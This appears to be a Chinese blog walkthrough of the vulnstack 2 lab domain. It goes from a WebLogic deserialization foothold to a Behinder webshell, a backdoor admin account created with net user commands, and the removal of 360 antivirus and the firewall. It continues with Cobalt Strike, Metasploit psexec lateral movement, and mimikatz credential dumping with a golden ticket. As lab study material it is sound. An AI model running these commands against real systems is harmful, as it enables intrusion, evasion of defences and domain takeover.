vulnstack(二)渗透实战

web渗透实战
发布日期:   2024-03-21
更新日期:   2024-07-22
文章字数:   1.3k
阅读时长:   4 分

vulnstack(二)渗透实战

方法一:

信息收集

今天的主角不是80端口,是7001端口

用的是WebLogic服务,用网上的工具进行扫描漏洞:

git clone https://github.com/dr0op/WeblogicScan.git
cd WeblogicScan
pip3 install -r requirements.txt
python3 WeblogicScan.py 192.168.239.80 7001

扫描出漏洞:

web外网渗透

这个靶场似乎知道是weblogic,目的性非常明确,方法也不是很多样,普遍的用法是用:Java反序列化终极测试工具下载通道

可以直接测试java反序列化,在外网获取内网信息

冰蝎——渗透大杀器

因为靶机开了360,常规的马没有用会被杀掉,或无法执行,因此我们用冰蝎代替蚁剑,因为冰蝎产生的马可以有一定的绕过效果,并且冰蝎确实会比蚁剑获取的信息更多些

红队大杀器 Behinder_v4.0(冰蝎4.0)-CSDN博客

用server文件夹下的jsp木马,默认密码为rebeyond,拿下shell

寻找木马位置

注入内存马稳定shell:

内网渗透

有两个网段,意味着有其他机子的存在

想办法把360做掉

干掉杀软

思路:
一、 3389上去直接关闭,需要创建管理员用户
二、 提权到system关闭
三、 对c2做免杀

创建用户

net user haha 1qaz@WSX /add
net localgroup Administrators haha /add

kali自带远程连接软件,使用命令

rdesktop 192.168.111.80

可以进入界面:

直接卸载360

卸载成功,接着关闭防火墙

成功,很刑很刺激!!可以为所欲为了!

上线cs

生成exe文件用冰蝎进行文件上传,并且运行.exe文件

成功上线

提升用户权限

提权成功,以system权限上线:

无法收集信息

实在是没啥办法探测什么东西,应该是环境问题,但是我找到一个cs的命令:

portscan 10.10.10.0-10.10.10.255 1-1024,3389,5000-6000 arp 1024

可以用arp探测获取10.10.10.0\24网段的所有主机,和它们的端口信息

有些人和我一样会碰到这个问题就是net user /domain无法探测会报错系统错误5,只能换这种方式了,再次取巧用下面这个命令去得到域控的主机名

ps:nbtstat 是一个命令行工具,用于显示基于 TCP/IP 的 NetBIOS (NetBT) 统计信息、本地计算机和远程计算机的 NetBIOS 名称表,以及 NetBIOS 名称缓存。你可以使用它来查询远程主机的 NetBIOS 名称。

nbtstat -A 10.10.10.10

cs设置socket代理传递msf

对system权限的靶机右击设置socket代理:

视图查看代理转发,并点击隧道:

在msf中输入指令:

setg Proxies socks4:192.168.111.128:9050 
# MSF所有流量将走此代理
setg ReverseAllowProxy true
# 设置允许反向代理,即建立双向通道
# 如果通过此socks反弹shell,则需要开启,否则不推荐开启
unsetg Proxies
# 可以使用该命令停止

打开/etc/proxychain4.conf文件进行配置socks4代理

proxychains4 nmap -F -sT -Pn 10.10.10.1/24

但是用这种扫描实在太慢,还不如用cs的arp扫描来的快,仅仅记录一下。

msf横向psexec上线

使用以下命令:

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.10.10
set SMBUser administrator
set SMBPass 1qaz@WSX
run

当然用cs进行也是没有问题的,但是创建的监听器是smb,不要混掉了,另外一个PC就不行了,肯定是环境原因,不懂错在哪因为它可以ping通其他主机,其他主机都ping不通它。

还是很喜欢cs的图形化界面,真的很有渗透那种感觉

权限维持

黄金票据

我们已拿到的域内所有的账户Hash,包括krbtgt账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域内加固时忘记重置krbtgt密码,基于此条件,我们还能利用该票据重新获得域管理员权限,利用krbtgt的HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于Kerberos认证的任何服务。

黄金票据————伪造票据授予票据(TGT),也被称为认证票据。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

krbtgt账户————系统在创建域时自动生成的一个账号,其密码是系统随机生成的,无法登录主机。这个账户的主要作用是作为密钥分发中心(KDC)的服务账号。在Kerberos认证过程中,KDC会使用krbtgt账户的密钥来签发票据授权票据(TGT)和服务票据(ST),从而完成用户的身份认证和访问授权。

使用下面两条指令可以更方便获取域sid与门卡密码
mimikatz privilege::debug

mimikatz lsadump::lsa /patch

先清除一下本机票据:

mimikatz kerberos::purge

伪造黄金票据:

成功注入票据:

over!!

文章作者: 矢坕
文章链接: http://airunfive.github.io/2024/03/21/vulnstack(%E4%BA%8C)%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
web渗透实战
  目录